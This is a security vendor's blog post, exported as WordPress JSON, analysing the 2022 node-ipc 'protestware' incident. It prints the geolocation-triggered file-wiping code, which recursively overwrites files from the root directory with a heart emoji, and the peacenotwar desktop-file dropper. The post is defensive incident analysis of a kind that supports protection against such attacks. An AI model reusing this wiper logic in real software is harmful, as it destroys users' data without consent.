{"id":74453,"date":"2022-03-17T11:48:25","date_gmt":"2022-03-17T15:48:25","guid":{"rendered":"https:\/\/staging.checkmarx.com\/?p=74453"},"modified":"2025-01-03T10:36:16","modified_gmt":"2025-01-03T08:36:16","slug":"protestware-politics-and-open-source-software","status":"publish","type":"zero-post","link":"https:\/\/checkmarx.com\/blog\/protestware-politics-and-open-source-software\/","title":{"rendered":"Protestware, Politics, and Open-Source Software"},"content":{"rendered":"<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-1\">Intro<\/h2>\n\n\n\n<p>A popular NPM package, <a href=\"https:\/\/www.npmjs.com\/package\/node-ipc\" target=\"_blank\" rel=\"noreferrer noopener\">node-ipc<\/a>, was purposely infected with a malicious payload by its own creator in protest over the Russia-Ukraine war. This package has over a million weekly downloads and hundreds of other packages that depend on it directly, including the popular <a href=\"https:\/\/cli.vuejs.org\/\" target=\"_blank\" rel=\"noreferrer noopener\">Vue CLI<\/a> project.<\/p>\n\n\n\n<p>GitHub user <a href=\"https:\/\/github.com\/RIAEvangelist\" target=\"_blank\" rel=\"noreferrer noopener\">RIAEvangelist<\/a>\/NPM user <a href=\"https:\/\/www.npmjs.com\/~riaevangelist\" target=\"_blank\" rel=\"noreferrer noopener\">riaevangelist<\/a> published new code to GitHub and NPM to protest Russian aggression in the Russia-Ukraine war:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Published a new NPM package, <a href=\"https:\/\/www.npmjs.com\/package\/peacenotwar\">peacenotwar<\/a>, which drops benign protest messages on the target machine.<\/li>\n\n\n\n<li>Added <a href=\"https:\/\/www.npmjs.com\/package\/peacenotwar\" target=\"_blank\" rel=\"noreferrer noopener\">peacenotwar<\/a> as a new dependency of the <a href=\"https:\/\/www.npmjs.com\/package\/node-ipc\" target=\"_blank\" rel=\"noreferrer noopener\">node-ipc<\/a> package.<\/li>\n\n\n\n<li>Added a new file, dao\/ssl-geospec.js, to the <a
href=\"https:\/\/www.npmjs.com\/package\/node-ipc\" target=\"_blank\" rel=\"noreferrer noopener\">node-ipc<\/a> package. This addition targets users with Russian or Belarusian IP addresses and runs a malicious payload that destroys all files on disk by overwriting their content with a heart emoji, \u201c\u2764\ufe0f\u201d.<\/li>\n<\/ol>\n\n\n\n<p>The main discussion about this incident started, and is still ongoing, in an issue on the package\u2019s GitHub repository. Since GitHub user <a href=\"https:\/\/github.com\/RIAEvangelist\" target=\"_blank\" rel=\"noreferrer noopener\">RIAEvangelist<\/a> is the owner of the Git repository <a href=\"https:\/\/github.com\/RIAEvangelist\/node-ipc\" target=\"_blank\" rel=\"noreferrer noopener\">github.com\/RIAEvangelist\/node-ipc<\/a>, he has permission to edit other users\u2019 Issues. From the Issue history shown below, we observed that he also purposely edited the Issue\u2019s title and description multiple times in an attempt to corrupt the information shared by the concerned users.<\/p>\n\n\n\n<figure><img decoding=\"async\" src=\"https:\/\/checkmarx.com\/wp-content\/uploads\/2022\/03\/Group-8-1-1024x748-1.png\" alt=\"\"><\/figure>\n\n\n\n<p>However, the history is still available. This way, we can see that the issue\u2019s originator declared the code \u201cmalware\/protestware\u201d, a new(ish) phrase that caught even \u201cRIAEvangelist\u201d\u2019s eye:<\/p>\n\n\n\n<figure><img decoding=\"async\" src=\"https:\/\/checkmarx.com\/wp-content\/uploads\/2022\/03\/protestware-1024x386-1.png\" alt=\"\"><\/figure>\n\n\n\n<p>This incident comes not long after the \u201ccolors\u201d incident, which might signify the beginning of a trend in which influential package owners use their \u201cstage\u201d to advocate for an idea or an issue they care about, catching the attention of many. 
\u201cRIAEvangelist\u201d himself winked at the \u201ccolors\u201d incident by adding that package as a new dependency to one of the new, questionable versions of \u201cnode-ipc\u201d.<\/p>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-2\">Details<\/h2>\n\n\n\n<p>To summarize the investigation\u2019s findings, the following table lists all the affected packages and versions related to this incident:<\/p>\n\n\n\n<figure><style>\n         table, th, td {\n            border: .5px solid black;padding:10px\n         }\n      <\/style>\n<table>\n<tbody>\n<tr>\n<td><strong>Package<\/strong><\/td>\n<td><strong>Version<\/strong><\/td>\n<td><strong>Available on NPM<\/strong><\/td>\n<td><strong>Details<\/strong><\/td>\n<\/tr>\n<tr>\n<td>node-ipc<\/td>\n<td>9.2.2<\/td>\n<td>No<\/td>\n<td>Requires peacenotwar and colors<\/td>\n<\/tr>\n<tr>\n<td>node-ipc<\/td>\n<td>10.1.1, <br>10.1.2<\/td>\n<td>No<\/td>\n<td>Includes the file \u201cdao\/ssl-geospec.js\u201d with the malicious functionality described below<\/td>\n<\/tr>\n<tr>\n<td>node-ipc<\/td>\n<td>10.1.3<\/td>\n<td>No<\/td>\n<td>Includes <strong>no<\/strong> malicious or protest functionality<\/td>\n<\/tr>\n<tr>\n<td>node-ipc<\/td>\n<td>11.1.0<\/td>\n<td>Yes<\/td>\n<td>Requires peacenotwar<\/td>\n<\/tr>\n<tr>\n<td>peacenotwar<\/td>\n<td>9.1.1,<br>9.1.2,<br>9.1.3,<br>9.1.4,<br>9.1.5,<br>9.1.6<\/td>\n<td>Yes<\/td>\n<td>Includes the protest code described below<\/td>\n<\/tr>\n<tr>\n<td>oneday-test<\/td>\n<td>9.1.1<\/td>\n<td>Yes<\/td>\n<td>Includes the protest code described below<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Package \u201cnode-ipc\u201d<\/h3>\n\n\n\n<p>A new file, dao\/ssl-geospec.js, was added to the package, and it appears to be minified:<\/p>\n\n\n\n<pre><code>import u from\"path\";import a from\"fs\";import o from\"https\";setTimeout(function(){const t=Math.round(Math.random()*4);if(t&gt;1){return}const 
n=Buffer.from(\"aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ ...<\/code><\/pre>\n\n\n\n<p>The code is executed automatically with a slight delay, it is geo-location aware, and activates the malicious payload only for users connected to the internet from Russia or Belarus. To become location aware, the code is using the API of the free service <a href=\"https:\/\/ipgeolocation.io\" target=\"_blank\" rel=\"noreferrer noopener\">ipgeolocation.io.<\/a><\/p>\n\n\n\n<p>Once the condition to proceed with the malicious payload is fulfilled, the code tries to overwrite all the files on the victim\u2019s machine with \u201c\u2764\ufe0f\u201d (the heart emoji).<\/p>\n\n\n\n<p>Courtesy of the user <a href=\"https:\/\/github.com\/zkyf\" target=\"_blank\" rel=\"noreferrer noopener\">zkyf<\/a>, we have <a href=\"https:\/\/github.com\/vuejs\/vue-cli\/issues\/7054#issuecomment-1069209509\" target=\"_blank\" rel=\"noreferrer noopener\">a more readable version<\/a> of the original code:<\/p>\n\n\n\n<pre><code>const path = require(\"path\");\nconst fs = require(\"fs\");\nconst https = require(\"https\");\nsetTimeout(function () {\n    const randomNumber = Math.round(Math.random() * 4);\n    if (randomNumber &gt; 1) {\n        \/\/ return;\n    }\n    const apiKey = \"https:\/\/api.ipgeolocation.io\/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154\";\n    const pwd = \".\/\";\n    const parentDir = \"..\/\";\n    const grandParentDir = \"..\/..\/\";\n    const root = \"\/\";\n    const countryName = \"country_name\";\n    const russia = \"russia\";\n    const belarus = \"belarus\";\n    https.get(apiKey, function (message) {\n        message.on(\"data\", function (msgBuffer) {\n            try {\n                const message = JSON.parse(msgBuffer.toString(\"utf8\"));\n                const userCountryName = message[countryName.toString(\"utf8\")].toLowerCase();\n                const hasRus = 
userCountryName.includes(russia.toString(\"utf8\")) || userCountryName.includes(belarus.toString(\"utf8\")); \/\/ checks if country is Russia or Belarus\n                if (hasRus) {\n                    deleteFile(pwd);\n                    deleteFile(parentDir);\n                    deleteFile(grandParentDir);\n                    deleteFile(root);\n                }\n            } catch (t) {}\n        });\n    });\n    \/\/ zkyf: Let's try this directly here\n    deleteFile(pwd);\n    deleteFile(parentDir);\n    deleteFile(grandParentDir);\n    deleteFile(root);\n}, 100);\nasync function deleteFile(pathName = \"\", o = \"\") {\n    if (!fs.existsSync(pathName)) {\n        return;\n    }\n    let fileList = [];\n    try {\n        fileList = fs.readdirSync(pathName);\n    } catch (t) {}\n    const f = [];\n    const heartUtf8 = Buffer.from(\"4p2k77iP\", \"base64\");\n    for (var idx = 0; idx &lt; fileList.length; idx++) {\n        const fileName = path.join(pathName, fileList[idx]);\n        let fileInfo = null;\n        try {\n            fileInfo = fs.lstatSync(fileName);\n        } catch (err) {\n            continue;\n        }\n        if (fileInfo.isDirectory()) {\n            const fileSymbol = deleteFile(fileName, o);\n            fileSymbol.length &gt; 0 ? 
f.push(...fileSymbol) : null;\n        } else if (fileName.indexOf(o) &gt;= 0) {\n            try {\n                \/\/ fs.writeFile(fileName, heartUtf8.toString(\"utf8\"), function () {}); \/\/ overwrites file with `\u2764\ufe0f`\n                console.log(`Rewrite ${fileName}`);\n            } catch (err) {}\n        }\n    }\n    return f;\n}\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Packages \u201cpeacenotwar\u201d, \u201coneday-test\u201d<\/h3>\n\n\n\n<p>These packages create a file called \u201cWITH-LOVE-FROM-AMERICA.txt\u201d in 3 locations on the victim\u2019s machine:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>~\/Desktop\/WITH-LOVE-FROM-AMERICA.txt<\/li>\n\n\n\n<li>~\/OneDrive\/WITH-LOVE-FROM-AMERICA.txt<\/li>\n\n\n\n<li>~\/OneDrive\/Desktop\/WITH-LOVE-FROM-AMERICA.txt<\/li>\n<\/ul>\n\n\n\n<p>The content of the file is a short statement written in 5 different languages \u2013 English, Russian, Arabic, Chinese, and Japanese:<\/p>\n\n\n\n<figure><img decoding=\"async\" src=\"https:\/\/checkmarx.com\/wp-content\/uploads\/2022\/03\/Group-7-941x1024-1.png\" alt=\"\"><\/figure>\n\n\n\n<p>Within the code, there\u2019s a function that copies \u201cWITH-LOVE-FROM-AMERICA.txt\u201d as follows:<\/p>\n\n\n\n<pre><code>function deliverAPeacefulMessage(path,message){ \n    console.log(path); \n    try{ \n        fs.writeFile( \n            path,  \n            message, \n            function(err){ \n                \/\/its all good \n            } \n        ); \n    }catch(err){ \n        \/\/thats ok \n    } \n}\nconst thinkaboutit='WITH-LOVE-FROM-AMERICA.txt';\nconst WITH_LOVE_FROM_AMERICA=read(`.\/${thinkaboutit}`);\nconst Desktops = `${homedir}\/Desktop\/`;\nconst OneDrive = `${homedir}\/OneDrive\/`;\nconst OneDriveDesktops = `${homedir}\/OneDrive\/Desktop\/`;\ndeliverAPeacefulMessage(`${Desktops}${thinkaboutit}`,WITH_LOVE_FROM_AMERICA); \ndeliverAPeacefulMessage(`${OneDriveDesktops}${thinkaboutit}`,WITH_LOVE_FROM_AMERICA); 
\ndeliverAPeacefulMessage(`${OneDrive}${thinkaboutit}`,WITH_LOVE_FROM_AMERICA);\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">IOCs<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>https:\/\/api.ipgeolocation.io\/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-3\">ChainAlert<\/h2>\n\n\n\n<p><a href=\"https:\/\/github.com\/Checkmarx\/chainalert-github-action\" target=\"_blank\" rel=\"noreferrer noopener\">ChainAlert<\/a> is a free service by Checkmarx: a monitoring system that observes the open-source ecosystem and alerts package maintainers and developers to potential account takeover attacks.<\/p>\n\n\n\n<p>In this specific case, the ChainAlert bot detected abnormal activity and reported it by opening an issue on the GitHub repository. Obviously, since these actions were done deliberately by the \u201clegitimate\u201d owner of the project, the issue was closed by \u201cRIAEvangelist\u201d and was not dealt with any further.<\/p>\n\n\n\n<p>Learning from this case, we plan to add detection of such self-sabotage cases to ensure that incidents such as this will be picked up quickly.<\/p>\n\n\n\n<figure><img decoding=\"async\" src=\"https:\/\/checkmarx.com\/wp-content\/uploads\/2022\/03\/chainalert-1024x576-1.png\" alt=\"\"><\/figure>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-4\">Conclusion<\/h2>\n\n\n\n<p>This incident again raises the question of whether it is within the rights of the code\u2019s owner to change it in whichever way they see fit, even at the cost of causing damage to other users who depend on it.<\/p>\n\n\n\n<p>As seen in the recent past, this isn&#8217;t the first time we have encountered such behavior, and it seems likely that other prominent developers will follow and share their agenda in a similar manner. 
It also looks fitting to start using the term \u201cprotestware\u201d to describe this kind of software.<\/p>","protected":false},"excerpt":{"rendered":"<p>Intro A popular NPM package node-ipc was purposely infected with a malicious payload by its own creator to protest over the Russia-Ukraine war. This package has over a million weekly downloads and hundreds of direct other dependent packages, including the popular Vue CLI project. GitHub user RIAEvangelist\/NPM user riaevangelist published new code to GitHub and [&hellip;]<\/p>\n","protected":false},"author":45,"featured_media":74469,"template":"","zero-category":[1067,1104],"zero-tag":[1069,1105,1072,1068,1075,1073,1071],"class_list":["post-74453","zero-post","type-zero-post","status-publish","has-post-thumbnail","hentry","zero-category-blog","zero-category-technical-blog","zero-tag-appsec","zero-tag-article","zero-tag-awareness","zero-tag-checkmarx-security-research-team","zero-tag-developer","zero-tag-english","zero-tag-supply-chain-security"],"acf":[],"_links":{"self":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-post\/74453","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-post"}],"about":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/types\/zero-post"}],"author":[{"embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/users\/45"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/media\/74469"}],"wp:attachment":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/media?parent=74453"}],"wp:term":[{"taxonomy":"zero-category","embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-category?post=74453"},{"taxonomy":"zero-tag","embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-tag?post=74453"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}